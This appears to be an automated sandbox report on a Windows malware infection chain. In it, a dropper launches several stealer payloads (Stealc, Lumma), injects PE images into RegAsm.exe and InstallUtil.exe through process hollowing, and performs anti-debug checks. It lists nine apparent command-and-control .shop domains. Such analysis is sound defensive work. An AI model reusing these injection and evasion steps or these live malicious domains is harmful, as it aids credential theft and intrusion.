Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05400E16 rdtsc

0_2_05400E16

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_06E441E0 LdrInitializeThunk,

9_2_06E441E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_00407B01

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_001BBDF9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

16_2_001BBDF9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041914C mov eax, dword ptr fs:[00000030h]	13_2_0041914C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004114A6 mov ecx, dword ptr fs:[00000030h]	13_2_004114A6
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001CA0F2 mov eax, dword ptr fs:[00000030h]	16_2_001CA0F2
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001C638B mov eax, dword ptr fs:[00000030h]	16_2_001C638B
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0024A0F2 mov eax, dword ptr fs:[00000030h]	17_2_0024A0F2
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0024638B mov eax, dword ptr fs:[00000030h]	17_2_0024638B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0041EFD8 GetProcessHeap,

13_2_0041EFD8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00407B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407C63 SetUnhandledExceptionFilter,	13_2_00407C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00407D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0040DD78
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001AD048 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_001AD048
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001C690E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_001C690E
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001ADA05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_001ADA05
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0022D048 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_0022D048
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0024690E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0024690E
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0022DA05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0022DA05

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: needmoney.exe PID: 6616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe

Code function: 7_2_027A24D9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

7_2_027A24D9

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: lootebarrkeyn.shop

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 117D008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4DC000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10CF008
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6FD008
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 802000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 80C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 82C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 773008
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45D000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 627008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904

Source: penis.exe, 00000018.00000002.2884267791.000000000315A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: axplong.exe	Binary or memory string: RtProgram Manager
Source: file.exe, 00000000.00000002.2100263900.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2132726768.00000000008DE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2137659091.00000000008DE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: tProgram Manager
Source: penis.exe, 00000018.00000002.2884267791.000000000315A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_004077E0 cpuid

13_2_004077E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_0041E825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_00414138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_0041EA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_0041EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	13_2_0041E412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_0041ECA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_0041ED76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_0041465E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_0041E60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_0041E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_0041E6B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_0041E79A

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformation	Jump to behavior
